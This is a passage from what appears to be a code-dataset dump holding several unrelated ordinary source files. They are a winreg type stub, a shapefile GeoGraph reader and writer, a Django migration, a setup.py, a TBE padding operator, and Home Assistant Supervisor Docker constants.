def DeleteKey(__key: _KeyType, __sub_key: str) -> None: ...
def DeleteKeyEx(key: _KeyType, sub_key: str, access: int = ..., reserved: int = ...) -> None: ...
def DeleteValue(__key: _KeyType, __value: str) -> None: ...
def EnumKey(__key: _KeyType, __index: int) -> str: ...
def EnumValue(__key: _KeyType, __index: int) -> Tuple[str, Any, int]: ...
def ExpandEnvironmentStrings(__str: str) -> str: ...
def FlushKey(__key: _KeyType) -> None: ...
def LoadKey(__key: _KeyType, __sub_key: str, __file_name: str) -> None: ...
def OpenKey(key: _KeyType, sub_key: str, reserved: int = ..., access: int = ...) -> HKEYType: ...
def OpenKeyEx(key: _KeyType, sub_key: str, reserved: int = ..., access: int = ...) -> HKEYType: ...
def QueryInfoKey(__key: _KeyType) -> Tuple[int, int, int]: ...
def QueryValue(__key: _KeyType, __sub_key: Optional[str]) -> str: ...
def QueryValueEx(__key: _KeyType, __name: str) -> Tuple[Any, int]: ...
def SaveKey(__key: _KeyType, __file_name: str) -> None: ...
def SetValue(__key: _KeyType, __sub_key: str, __type: int, __value: str) -> None: ...
def SetValueEx(
__key: _KeyType, __value_name: Optional[str], __reserved: Any, __type: int, __value: Union[str, int]
) -> None: ... # reserved is ignored
def DisableReflectionKey(__key: _KeyType) -> None: ...
def EnableReflectionKey(__key: _KeyType) -> None: ...
def QueryReflectionKey(__key: _KeyType) -> bool: ...
HKEY_CLASSES_ROOT: int
HKEY_CURRENT_USER: int
HKEY_LOCAL_MACHINE: int
HKEY_USERS: int
HKEY_PERFORMANCE_DATA: int
HKEY_CURRENT_CONFIG: int
HKEY_DYN_DATA: int
KEY_ALL_ACCESS: int
KEY_WRITE: int
KEY_READ: int
KEY_EXECUTE: int
KEY_QUERY_VALUE: int
KEY_SET_VALUE: int
KEY_CREATE_SUB_KEY: int
KEY_ENUMERATE_SUB_KEYS: int
KEY_NOTIFY: int
KEY_CREATE_LINK: int
KEY_WOW64_64KEY: int
KEY_WOW64_32KEY: int
REG_BINARY: int
REG_DWORD: int
REG_DWORD_LITTLE_ENDIAN: int
REG_DWORD_BIG_ENDIAN: int
REG_EXPAND_SZ: int
REG_LINK: int
REG_MULTI_SZ: int
REG_NONE: int
REG_QWORD: int
REG_QWORD_LITTLE_ENDIAN: int
REG_RESOURCE_LIST: int
REG_FULL_RESOURCE_DESCRIPTOR: int
REG_RESOURCE_REQUIREMENTS_LIST: int
REG_SZ: int
REG_CREATED_NEW_KEY: int # undocumented
REG_LEGAL_CHANGE_FILTER: int # undocumented
REG_LEGAL_OPTION: int # undocumented
REG_NOTIFY_CHANGE_ATTRIBUTES: int # undocumented
REG_NOTIFY_CHANGE_LAST_SET: int # undocumented
REG_NOTIFY_CHANGE_NAME: int # undocumented
REG_NOTIFY_CHANGE_SECURITY: int # undocumented
REG_NO_LAZY_FLUSH: int # undocumented
REG_OPENED_EXISTING_KEY: int # undocumented
REG_OPTION_BACKUP_RESTORE: int # undocumented
REG_OPTION_CREATE_LINK: int # undocumented
REG_OPTION_NON_VOLATILE: int # undocumented
REG_OPTION_OPEN_LINK: int # undocumented
REG_OPTION_RESERVED: int # undocumented
REG_OPTION_VOLATILE: int # undocumented
REG_REFRESH_HIVE: int # undocumented
REG_WHOLE_HIVE_VOLATILE: int # undocumented
error = OSError
# Though this class has a __name__ of PyHKEY, it's exposed as HKEYType for some reason
class HKEYType:
def __bool__(self) -> bool: ...
def __int__(self) -> int: ...
def __enter__(self) -> HKEYType: ...
def __exit__(
self, exc_type: Optional[Type[BaseException]], exc_val: Optional[BaseException], exc_tb: Optional[TracebackType]
) -> Optional[bool]: ...
def Close(self) -> None: ...
def Detach(self) -> int: ...
| [
"[email protected]"
] | |
9848fd410ddb1d313b711e656fde9ae27d2261fd | 732d750ce7b96090bc1b252fbefdadfe167990a1 | /networker/io/__init__.py | 3ac84486d4ee66edda8e7eb94ebf4c159a76b37a | [] | no_license | carbz/networker | 4008174200db1865635f524646ad550187a4d289 | cab14026118db42603bd1a5757ec460c6cb4984d | refs/heads/master | 2021-01-15T10:24:59.858048 | 2015-04-22T17:11:49 | 2015-04-22T17:11:49 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,465 | py | # -*- coding: utf-8 -*-
import ogr
import osr
import networkx as nx
import networker.geomath as gm
from networker.classes.geograph import GeoGraph
import warnings
import os
"""
Package for reading/writing networkx based GeoGraphs
Note: these wrap existing networkx functions for custom behavior
"""
def load_shp(shp_path):
""" loads a shapefile into a networkx based GeoGraph object
Args:
shp_path: string path to a line or point shapefile
Returns:
geograph: GeoGraph
"""
    # NOTE: if shp_path is unicode, the underlying shapefile I/O fails for
    # some reason, so coerce it to a plain byte string first
shp_path = shp_path.encode('ascii', 'ignore')
g = nx.read_shp(shp_path)
coords = dict(enumerate(g.nodes()))
driver = ogr.GetDriverByName('ESRI Shapefile')
shp = driver.Open(shp_path)
layer = shp.GetLayer()
spatial_ref = layer.GetSpatialRef()
proj4 = None
if not spatial_ref:
if gm.is_in_lon_lat(coords):
proj4 = gm.PROJ4_LATLONG
else:
warnings.warn("Spatial Reference could not be set for {}".
format(shp_path))
else:
proj4 = spatial_ref.ExportToProj4()
g = nx.convert_node_labels_to_integers(g)
return GeoGraph(srs=proj4, coords=coords, data=g)
def write_shp(geograph, shp_dir):
""" writes a shapefile from a networkx based GeoGraph object
Args:
geograph: GeoGraph object
shp_dir: string path to dir to write shape files
"""
assert geograph.is_aligned()
# looks like networkx wants us to relabel nodes by their coords
tup_map = {i: tuple(coords) for i, coords in geograph.coords.items()}
# copy geograph to plain networkx graph
# (relabeling a GeoGraph doesn't seem to work)
nx_coord_graph = nx.Graph(data=geograph)
nx.relabel_nodes(nx_coord_graph, tup_map, copy=False)
nx.write_shp(nx_coord_graph, shp_dir)
if geograph.srs:
# write srs info to prj file (nx seems to miss this)
sr = osr.SpatialReference()
sr.ImportFromProj4(geograph.srs)
main_prj_filename = shp_dir + '.prj'
edge_prj_filename = os.path.join(shp_dir, 'edges.prj')
node_prj_filename = os.path.join(shp_dir, 'nodes.prj')
def write_prj(prj_filename):
out = open(prj_filename, 'w')
out.write(sr.ExportToWkt())
out.close()
write_prj(main_prj_filename)
write_prj(edge_prj_filename)
write_prj(node_prj_filename)
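

if __name__ == "__main__":
    # Usage sketch (illustrative only): "data/lines.shp" and "out_network"
    # are hypothetical paths, not part of this package; substitute real ones.
    gg = load_shp("data/lines.shp")
    print("loaded %d nodes, srs: %s" % (len(gg.coords), gg.srs))
    write_shp(gg, "out_network")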
| [
"[email protected]"
] | |
43b694369a93e5b2fca5c24a9a3ea7ae339c90e4 | 604bd9370a5b4e61a5f9e533c6612bc94aef0c6c | /django/helpdesk_deploy_old/helpdesk/base/migrations/0005_auto_20201210_0554.py | ac187c287afd3fa9fa8cede7bf91012b73480f43 | [
"Apache-2.0"
] | permissive | Netromnik/python | 2ba2f15b56e635b53c12ef39ed776b9577c08dff | 630a9df63b1cade9af38de07bb9cd0c3b8694c93 | refs/heads/main | 2023-06-16T04:58:35.634371 | 2021-07-18T16:20:13 | 2021-07-18T16:20:13 | 355,891,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | # Generated by Django 3.1.2 on 2020-12-10 05:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('base', '0004_auto_20201114_1445'),
]
operations = [
migrations.AddField(
model_name='collectmedia',
name='groups',
field=models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='_collectmedia_groups_+', to='base.CustomGroup', verbose_name='groups'),
),
migrations.AlterField(
model_name='collectmedia',
name='name',
field=models.CharField(max_length=30, unique=True),
),
]
| [
"[email protected]"
] | |
e261f4ac64cfeda090c8d41631cb690d60dd4505 | 964f2882117ff656d7a2757c233c6dd88226d975 | /services/autoscaling/setup.py | e3e711abf8319d6d068bac1c11a37bd4253ee6bd | [
"MIT"
] | permissive | ignapas/osparc-simcore | a002dd47d7689af9c1c650eea33e31add2b182c1 | cb62e56b194265a907f260f3071c55a65f569823 | refs/heads/master | 2023-01-22T08:55:32.580775 | 2022-12-09T15:57:36 | 2022-12-09T15:57:36 | 170,852,656 | 0 | 0 | MIT | 2023-01-09T05:03:04 | 2019-02-15T11:12:34 | Python | UTF-8 | Python | false | false | 1,726 | py | #!/usr/bin/env python3
import re
import sys
from pathlib import Path
from setuptools import find_packages, setup
def read_reqs(reqs_path: Path) -> set[str]:
return {
r
for r in re.findall(
r"(^[^#\n-][\w\[,\]]+[-~>=<.\w]*)",
reqs_path.read_text(),
re.MULTILINE,
)
if isinstance(r, str)
}
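# NOTE: the regex above keeps requirement specifiers such as
# "fastapi[all]>=0.85" or "pydantic~=1.10" (illustrative examples) and skips
# comment lines ("# ...") and option lines ("-r ...", "-c ...").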
CURRENT_DIR = Path(sys.argv[0] if __name__ == "__main__" else __file__).resolve().parent
NAME = "simcore-service-autoscaling"
VERSION = (CURRENT_DIR / "VERSION").read_text().strip()
AUTHORS = (
"Alexandre Allexandre (Surfict)",
"Sylvain Anderegg (sanderegg)",
"Pedro Crespo-Valero (pcrespov)",
)
DESCRIPTION = "Service to autoscale swarm resources"
README = (CURRENT_DIR / "README.md").read_text()
PROD_REQUIREMENTS = tuple(
read_reqs(CURRENT_DIR / "requirements" / "_base.txt")
| {
"simcore-models-library",
"simcore-service-library[fastapi]",
"simcore-settings-library",
}
)
TEST_REQUIREMENTS = tuple(read_reqs(CURRENT_DIR / "requirements" / "_test.txt"))
SETUP = dict(
name=NAME,
version=VERSION,
author=AUTHORS,
description=DESCRIPTION,
long_description=README,
license="MIT license",
python_requires="~=3.9",
packages=find_packages(where="src"),
package_dir={
"": "src",
},
include_package_data=True,
install_requires=PROD_REQUIREMENTS,
test_suite="tests",
tests_require=TEST_REQUIREMENTS,
extras_require={"test": TEST_REQUIREMENTS},
entry_points={
"console_scripts": [
"simcore-service-autoscaling = simcore_service_autoscaling.cli:main",
],
},
)
if __name__ == "__main__":
setup(**SETUP)
| [
"[email protected]"
] | |
9f579c8c5747a6de0aa87b0fd4321ae93b6efe44 | 1ebe5a07e7f6260c2c2ceb6ca00dcf2a0341e544 | /op_impl/built-in/ai_core/tbe/impl/dynamic/pad_not_align.py | 98cd8a0f3f998ba392725878df3a65ed17db1c78 | [] | no_license | gekowa/ascend-opp | f5e09905336d85f9974d555d03d37a75cb8185c1 | 5c28a2faf9d2a117ea6f0923efe35fcd53904dd2 | refs/heads/master | 2023-04-09T12:14:40.337104 | 2021-04-19T23:00:59 | 2021-04-19T23:00:59 | 359,620,865 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,929 | py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
This program is free software; you can redistribute it and/or modify
it under the terms of the Apache License Version 2.0.You may not use this file
except in compliance with the License.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
Apache License for more details at
http://www.apache.org/licenses/LICENSE-2.0
PadD: Not Align
"""
from te import tik
# vector_repeat
MAX_REPEAT = 255
# block_size
BLOCK_SIZE = 32
def set_vector_dup(obj, num_data, number):
"""
Re:
Func supports that num_data == N*mask(less than buf_size)
"""
tik_instance = obj.tik_instance
unit = MAX_REPEAT * obj.mask
repeat_merchant = num_data // unit
repeat_remainder = num_data % unit
dst_blk_stride = 1
dst_rep_stride = 8
with tik_instance.for_range(0, repeat_merchant) as i:
tik_instance.vector_dup(obj.mask,
obj.buf[i*unit],
number,
MAX_REPEAT,
dst_blk_stride,
dst_rep_stride)
with tik_instance.if_scope(repeat_remainder != 0):
repeats = repeat_remainder / obj.mask
with tik_instance.if_scope(repeats != 0):
tik_instance.vector_dup(obj.mask,
obj.buf[repeat_merchant*unit],
number,
repeats,
dst_blk_stride,
dst_rep_stride)
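# Worked example (illustrative): with mask = 128 (fp16), the per-iteration
# unit is 255 * 128 = 32640 elements; num_data = 65536 then gives
# repeat_merchant = 2 full bursts and repeat_remainder = 256, i.e. one final
# vector_dup with repeats = 256 / 128 = 2.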
def copy_buf2gm_circulation(obj, ac_num, vir_num, dst_idx, pattern=None):
"""
    ac_num: volume of actual data in UB.
    vir_num: upper bound for ac_num; must be 32B-aligned.
    pattern: "top" and "bottom" take different paths in the recursion.
    Re: Func handles three kinds of move-out:
    1. ac_num too large to fit in UB at once.
    2. ac_num >= 32B, covering both the aligned part and the unaligned remainder.
    3. ac_num < 32B, which only supports "Single Core".
"""
tik_instance = obj.tik_instance
num_bit = obj.num_bit
dst = obj.output_gm
src = obj.buf
tail = ac_num // vir_num
tail_block = ac_num % vir_num
block_num = BLOCK_SIZE // num_bit
def _copy_ub2gm(begin_idx, data_len, idx):
idx += begin_idx
n_burst = 1
burst_len = data_len * num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(dst[idx],
src[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# kind_0
with tik_instance.if_scope(tail != 0):
with tik_instance.for_range(0, tail) as serial:
_copy_ub2gm(serial*vir_num, vir_num, dst_idx)
with tik_instance.if_scope(tail_block != 0):
align_vol = tail_block / block_num * block_num
not_align_vol = tail_block % block_num
offset = block_num - not_align_vol
# kind_1
with tik_instance.if_scope(align_vol != 0):
_copy_ub2gm(tail*vir_num, align_vol, dst_idx)
# kind_2
with tik_instance.if_scope(not_align_vol != 0):
address = tail * vir_num + align_vol - offset
if pattern == "bottom":
_copy_ub2gm(address, block_num, dst_idx)
else:
with tik_instance.if_scope(address > 0):
_copy_ub2gm(address, block_num, dst_idx)
with tik_instance.else_scope():
_copy_ub2gm(0, block_num, dst_idx)
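# Worked example (illustrative, fp32 so block_num = 8): with ac_num = 100 and
# vir_num = 64, tail = 1 and tail_block = 36; one full 64-element burst goes
# out (kind_0), then align_vol = 32 elements (kind_1), and the remaining
# not_align_vol = 4 elements are covered by one more full 8-element block
# starting 4 elements early (address 92), overlapping already-written pad
# values so the store stays 32B-aligned (kind_2).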
def _do_vec_dup(pattern, obj, max_num, blk_idx, mark, axis):
"""
Params:
top_address: start address for top padding.
top_div_core: dividing line between two types of cores in top padding.
top_total_core: physical cores for top padding.
top_core_vol_x: volume of data processed by each core(type_x) for top padding.
top_core_gap_x: gap between different cores(type_x) for top padding.
Solution: MAX_CORE = 32
in_shape is [34,16,16,16,...],func will work in [0, ] only.
in_shape is [16,16,16,16,...],func will work in [0, 1].
"""
if pattern == "top":
begin_index = obj.top_address[axis]
division_core = obj.top_div_core[axis]
total_core = obj.top_total_core[axis]
core_data_0 = obj.top_core_vol_0[axis]
core_data_1 = obj.top_core_vol_1[axis]
core_gap_0 = obj.top_core_gap_0[axis]
core_gap_1 = obj.top_core_gap_1[axis]
pad_data = obj.top_vol[axis]
else:
begin_index = obj.bottom_address[axis]
division_core = obj.bottom_div_core[axis]
total_core = obj.bottom_total_core[axis]
core_data_0 = obj.bottom_core_vol_0[axis]
core_data_1 = obj.bottom_core_vol_1[axis]
core_gap_0 = obj.bottom_core_gap_0[axis]
core_gap_1 = obj.bottom_core_gap_1[axis]
pad_data = obj.bottom_vol[axis]
    # determine whether this is the first padding layer or not.
offset = obj.tik_instance.Scalar("int64", name="cir_offset_")
offset_value = pad_data - core_data_0 * (division_core + 1) \
- core_data_1 * (total_core - division_core - 1)
offset.set_as(offset_value)
with obj.tik_instance.if_scope(pad_data - core_data_0 == 0):
# not the first layer
offset.set_as(0)
vir_num, block_index = max_num, blk_idx
# vector_dup: all physical cores.
with obj.tik_instance.if_scope(mark != 1):
set_vector_dup(obj, vir_num, 0)
# data_move
with obj.tik_instance.if_scope(block_index < division_core):
dst_idx = begin_index + block_index * core_gap_0
copy_buf2gm_circulation(obj, core_data_0, vir_num, dst_idx)
with obj.tik_instance.if_scope(block_index == division_core):
dst_idx = begin_index + division_core * core_gap_0
copy_buf2gm_circulation(obj, core_data_0+offset, vir_num, dst_idx)
with obj.tik_instance.if_scope(
tik.all(block_index > division_core,
block_index < total_core)):
begin_index += core_gap_0 * (division_core + 1) + offset
block_index = block_index - (division_core + 1)
dst_idx = begin_index + block_index * core_gap_1
copy_buf2gm_circulation(obj, core_data_1, vir_num, dst_idx)
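# Worked example (illustrative numbers): pad_data = 103 spread over
# total_core = 8 cores with division_core = 3, core_data_0 = 13 and
# core_data_1 = 12 gives offset = 103 - 13*4 - 12*4 = 3; the 3 leftover
# elements are absorbed by the dividing core (blk_idx == division_core).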
def _copy_gm2buf(obj, in_num, src_ub, src_gm):
# ub must can be save all_data
obj.tik_instance.data_move(obj.buf[src_ub],
obj.input_gm[src_gm],
0, 1,
in_num * obj.num_bit // BLOCK_SIZE,
0, 0)
def _copy_buf2buf(obj, n_burst, burst_len, src_stride, dst_stride, src_ub, dst_ub):
obj.tik_instance.data_move(obj.buf[dst_ub],
obj.buf[src_ub],
0, n_burst, burst_len,
src_stride, dst_stride)
def _copy_buf2gm(obj, in_num, dst_gm, max_num):
"""
Re:
in_num: data that can be any value.
Func requires in_num <= buf_size.
"""
tik_instance = obj.tik_instance
block_num = BLOCK_SIZE // obj.num_bit
align_vol = in_num / block_num * block_num
not_align_vol = in_num % block_num
offset = block_num - not_align_vol
def _move_out(begin_idx, data_len, dst_idx, buf):
dst_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(obj.output_gm[dst_idx],
buf[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# Maybe not align.
tik_align(obj, in_num, max_num, block_num)
with tik_instance.if_scope(align_vol == 0):
_move_out(0, block_num, dst_gm, obj.buf)
with tik_instance.else_scope():
_move_out(0, align_vol, dst_gm, obj.buf)
# Move out not align
with tik_instance.if_scope(not_align_vol != 0):
index = align_vol-offset
with tik_instance.for_range(0, block_num) as i:
obj.help_buf[i] = obj.buf[index+i]
_move_out(index, block_num, dst_gm, obj.help_buf)
def _data_move_last_dim(obj, in_num, src_gm, dst_gm, max_num):
"""
    in_num: actual input data (padding excluded).
    Re:
        Func requires in_num >= 32 (guaranteed by tiling.cpp).
"""
tik_instance = obj.tik_instance
block_num = BLOCK_SIZE // obj.num_bit
vir_num = obj.buf_size
# move align of in_num
tail = in_num // vir_num
tail_block = in_num % vir_num
def _move_in(begin_idx, data_len, src_idx, buf):
src_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(buf[0],
obj.input_gm[src_idx],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
def _move_out(begin_idx, data_len, dst_idx, buf):
dst_idx += begin_idx
n_burst = 1
burst_len = data_len * obj.num_bit // BLOCK_SIZE
src_stride = 0
dst_stride = 0
tik_instance.data_move(obj.output_gm[dst_idx],
buf[0],
0,
n_burst,
burst_len,
src_stride,
dst_stride)
# Must align: buf_size is N * mask.
with tik_instance.if_scope(tail != 0):
with tik_instance.for_range(0, tail) as serial:
_move_in(serial*vir_num, vir_num, src_gm, obj.buf)
_move_out(serial*vir_num, vir_num, dst_gm, obj.buf)
# Maybe not align.
with tik_instance.if_scope(tail_block != 0):
align_vol = tail_block / block_num * block_num
not_align_vol = tail_block % block_num
offset = block_num - not_align_vol
# Move in
tik_align(obj, tail_block, max_num, block_num)
with tik_instance.if_scope(align_vol == 0):
_move_in(tail*vir_num-offset, block_num, src_gm, obj.buf)
_move_out(tail*vir_num-offset, block_num, dst_gm, obj.buf)
with tik_instance.else_scope():
_move_in(tail*vir_num, max_num, src_gm, obj.buf)
_move_out(tail*vir_num, align_vol, dst_gm, obj.buf)
# Move out not align
with tik_instance.if_scope(not_align_vol != 0):
index = align_vol-offset
with tik_instance.for_range(0, block_num) as i:
obj.help_buf[i] = obj.buf[index+i]
_move_out(tail*vir_num+index, block_num, dst_gm, obj.help_buf)
def tik_max(obj, top, bottom, max_num):
max_num.set_as(bottom)
with obj.tik_instance.if_scope(top > bottom):
max_num.set_as(top)
tik_align(obj, max_num, max_num, obj.mask)
def tik_align(obj, in_num, max_num, align_vol):
"""
    in_num: volume of data.
    max_num: scalar that receives the result of this func.
    align_vol: alignment unit: (BLOCK_SIZE/num_bit) or mask.
    buf_size: must be N*(BLOCK_SIZE/num_bit) or M*mask.
    Re:
        In the "not_align" module, some variables must be aligned during computation.
"""
max_num.set_as(in_num)
with obj.tik_instance.if_scope(in_num % align_vol != 0):
max_num.set_as((in_num / align_vol + 1) * align_vol)
with obj.tik_instance.if_scope(max_num >= obj.buf_size):
max_num.set_as(obj.buf_size)
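# Worked example (illustrative): tik_align with in_num = 100 and
# align_vol = 16 rounds up to max_num = (100 / 16 + 1) * 16 = 112 (integer
# division), and the result is capped at obj.buf_size if it would exceed it.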
def _circulation(obj, blk_idx, mark, axis):
"""
eg: input: [16,16,22] output: [18,18,24]
padding:[[1,1],[1,1],[1,1]]
depth: 2
input: [16,16,4] output: [18,18,6]
padding:[[1,1],[1,1],[1,1]]
depth: 1
ps: input[1] can't satisfy multi core
top_vol[0]: 1*18*24;
bottom_vol[1]: 1*24;
"""
# vol of padding.
max_num = obj.tik_instance.Scalar("int32", name="max_num_")
tik_max(obj, obj.top_vol[axis], obj.bottom_vol[axis], max_num)
# do padding
with obj.tik_instance.if_scope(obj.top_vol[axis] > 0):
_do_vec_dup("top", obj, max_num, blk_idx, mark, axis)
mark.set_as(1)
with obj.tik_instance.if_scope(obj.bottom_vol[axis] > 0):
_do_vec_dup("bottom", obj, max_num, blk_idx, mark, axis)
mark.set_as(1)
def _recursion(obj, axis, dst_gm, src_gm, src_ub, dst_ub, max_num, mark):
"""
    recur_model: model is "Sort" or "MoveIn". "Sort" means shape[axis:] can be sorted in UB; "MoveIn" means it cannot.
recur_dup_mk: mark of vector dup or not (One-Time-Triggered).
prod_new_out: axis-by-axis multiplication base on new out_shape.
prod_new_in: axis-by-axis multiplication base on new in_shape.
recur_gm2buf_mk: mark of GM_2_BUF (One-Time-Triggered).
new_padding_top: top of new_padding in recursion.
new_in_shape: new in_shape in recursion
"""
if axis == obj.axis_amount:
return
# ==================================
# Only axis >= depth, tik will work.
# ==================================
# Status in different layers: Sort or MoveIn
model = obj.recur_model[axis]
buf_src = obj.tik_instance.Scalar("int32", name="buf_src_"+str(axis)+"_")
buf_dst = obj.tik_instance.Scalar("int32", name="buf_dst_"+str(axis)+"_")
buf_src.set_as(src_ub)
buf_dst.set_as(dst_ub)
# ===============================
# Step1: Condition: "Sort"
# Requirement: in_shape[-1] < 32
# ===============================
with obj.tik_instance.if_scope(model == 1):
# Vector_Dup (One-Time-Triggered)
# mark_dup: vec_dup or not.
mark_dup = obj.recur_dup_mk[axis]
with obj.tik_instance.if_scope(mark_dup == 1):
tik_align(obj, obj.prod_new_out[axis], max_num, obj.mask)
set_vector_dup(obj, max_num, 0)
# GM_2_BUF (One-Time-Triggered)
# mark_gm2buf: dma data from gm to ub or not.
mark_gm2buf = obj.recur_gm2buf_mk[axis]
with obj.tik_instance.if_scope(mark_gm2buf == 1):
# init_align buf_src and num of moveIn.
# requirement: align(output) + align(input) <= buf_size
tik_align(obj, obj.prod_new_out[axis], buf_src, BLOCK_SIZE/obj.num_bit)
tik_align(obj, obj.prod_new_in[axis], max_num, BLOCK_SIZE/obj.num_bit)
_copy_gm2buf(obj, max_num, buf_src, src_gm)
# Go to next level until the last dim
top = obj.new_padding_top[axis] * obj.prod_new_out[axis+1]
if axis <= obj.axis_amount - 2:
loop = obj.new_in_shape[axis]
with obj.tik_instance.for_range(0, loop) as i:
dst_ub = buf_dst + top + obj.prod_new_out[axis+1] * i
src_ub = buf_src + obj.prod_new_in[axis+1] * i
_recursion(obj, axis+1, dst_gm, src_gm, src_ub, dst_ub, max_num, True)
# the last dim
# require total_num_ub < 32
else:
total_scalar = obj.prod_new_in[axis]
with obj.tik_instance.for_range(0, total_scalar) as i:
obj.buf[buf_dst + top + i] = obj.buf[buf_src + i]
# BUF_2_GM (One-Time-Triggered)
# Only happened in the layer which GM_2_BUF had worked.
with obj.tik_instance.if_scope(mark_gm2buf == 1):
in_num = obj.prod_new_out[axis]
_copy_buf2gm(obj, in_num, dst_gm, max_num)
# ================================
# Step0: Condition: "MoveIn"
# Requirement: in_shape[-1] >= 32
# ================================
if not mark:
with obj.tik_instance.if_scope(model == 0):
in_num_top = obj.new_padding_top[axis] * obj.prod_new_out[axis+1]
in_num_bottom = obj.new_padding_bottom[axis] * obj.prod_new_out[axis+1]
tik_max(obj, in_num_top, in_num_bottom, max_num)
# vec_dup or not
with obj.tik_instance.if_scope(max_num > 0):
set_vector_dup(obj, max_num, 0)
# axis in [0: last_dim), in_num_X must >= 32 or 0.
# axis is last_dim, in_num_X can be any.
with obj.tik_instance.if_scope(in_num_top > 0):
copy_buf2gm_circulation(obj, in_num_top, max_num, dst_gm, "top")
with obj.tik_instance.if_scope(in_num_bottom > 0):
dst_gm_bottom = dst_gm + obj.new_in_shape[axis] * \
obj.prod_new_out[axis+1] + in_num_top
copy_buf2gm_circulation(obj, in_num_bottom, max_num, dst_gm_bottom, "bottom")
dst_gm += in_num_top
if axis <= obj.axis_amount - 2:
with obj.tik_instance.for_range(0, obj.new_in_shape[axis]) as i:
dst_gm += obj.prod_new_out[axis+1] * i
src_gm += obj.prod_new_in[axis+1] * i
_recursion(obj, axis+1, dst_gm, src_gm, buf_src, buf_dst, max_num, False)
else:
# copy_buf2gm until model is "MoveIn" in the last axis.
_data_move_last_dim(obj, obj.prod_new_in[axis], src_gm, dst_gm, max_num)
def _circulation_compute(obj, blk_idx):
"""
    All axes are traversed until the axis index reaches "depth".
    depth: depth from tiling.cpp.
    mark: status register that avoids redundant vector_dup calls in circulation.
"""
tik_instance = obj.tik_instance
mark = obj.tik_instance.Scalar("int32", name="mark", init_value=0)
for axis, _ in enumerate(range(obj.axis_amount)):
with tik_instance.if_scope(axis < obj.depth[0]):
_circulation(obj, blk_idx, mark, axis)
def _recursion_compute(obj, blk_idx):
"""
recur_cond: condition that torch off stride between different cores.
recur_gap_x: gap_x between in diff cores.
recur_loop_x: work times by each core(type_x).
recur_in_vol: volume of input_data by each core do once.
recur_div_core: dividing line between two types of core.
recur_total_core: physical cores in recursion.
recur_start_address: start address in recursion
"""
tik_instance = obj.tik_instance
cond, gap0, gap1 = obj.recur_cond[0], obj.recur_gap_0[0], obj.recur_gap_1[0]
loop0, loop1, in_vol = obj.recur_loop_0[0], obj.recur_loop_1[0], obj.recur_in_vol[0]
max_num = obj.tik_instance.Scalar("int32", name="max_num_")
def _main(processed, loop, block_index):
src_ub = 0
dst_ub = 0
dst_gm = obj.recur_start_address[0]
src_gm = 0
axis = 0
with tik_instance.for_range(0, loop) as idx:
sum_core = processed + block_index * loop + idx
dst_gm += sum_core / cond * gap0 + sum_core % cond * gap1
src_gm += sum_core * in_vol
_recursion(obj, axis, dst_gm, src_gm, src_ub, dst_ub, max_num, False)
with tik_instance.if_scope(blk_idx <= obj.recur_div_core[0]):
pro = 0
_main(pro, loop0, blk_idx)
with tik_instance.if_scope(tik.all(blk_idx > obj.recur_div_core[0],
blk_idx < obj.recur_total_core[0])):
pro = (obj.recur_div_core[0] + 1) * loop0
blk_idx = blk_idx - obj.recur_div_core[0] - 1
_main(pro, loop1, blk_idx)
def not_align_compute(obj, blk_idx):
# =================
# circulation layer
# =================
_circulation_compute(obj, blk_idx)
# =================
# recursion layer
# =================
_recursion_compute(obj, blk_idx)
| [
"[email protected]"
] | |
480f230a8f4d7f2d2cb4b1c639c05909e1bd21f2 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/docker/const.py | f8e3edbeb75efcfbbb06b5df64772e6a083b2986 | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 2,030 | py | """Docker constants."""
from enum import Enum
from docker.types import Mount
from ..const import MACHINE_ID
class Capabilities(str, Enum):
"""Linux Capabilities."""
BPF = "BPF"
DAC_READ_SEARCH = "DAC_READ_SEARCH"
IPC_LOCK = "IPC_LOCK"
NET_ADMIN = "NET_ADMIN"
NET_RAW = "NET_RAW"
PERFMON = "PERFMON"
SYS_ADMIN = "SYS_ADMIN"
SYS_MODULE = "SYS_MODULE"
SYS_NICE = "SYS_NICE"
SYS_PTRACE = "SYS_PTRACE"
SYS_RAWIO = "SYS_RAWIO"
SYS_RESOURCE = "SYS_RESOURCE"
SYS_TIME = "SYS_TIME"
class ContainerState(str, Enum):
"""State of supervisor managed docker container."""
FAILED = "failed"
HEALTHY = "healthy"
RUNNING = "running"
STOPPED = "stopped"
UNHEALTHY = "unhealthy"
UNKNOWN = "unknown"
class RestartPolicy(str, Enum):
"""Restart policy of container."""
NO = "no"
ON_FAILURE = "on-failure"
UNLESS_STOPPED = "unless-stopped"
ALWAYS = "always"
class MountType(str, Enum):
"""Mount type."""
BIND = "bind"
VOLUME = "volume"
TMPFS = "tmpfs"
NPIPE = "npipe"
class PropagationMode(str, Enum):
"""Propagataion mode, only for bind type mounts."""
PRIVATE = "private"
SHARED = "shared"
SLAVE = "slave"
RPRIVATE = "rprivate"
RSHARED = "rshared"
RSLAVE = "rslave"
ENV_TIME = "TZ"
ENV_TOKEN = "SUPERVISOR_TOKEN"
ENV_TOKEN_OLD = "HASSIO_TOKEN"
LABEL_MANAGED = "supervisor_managed"
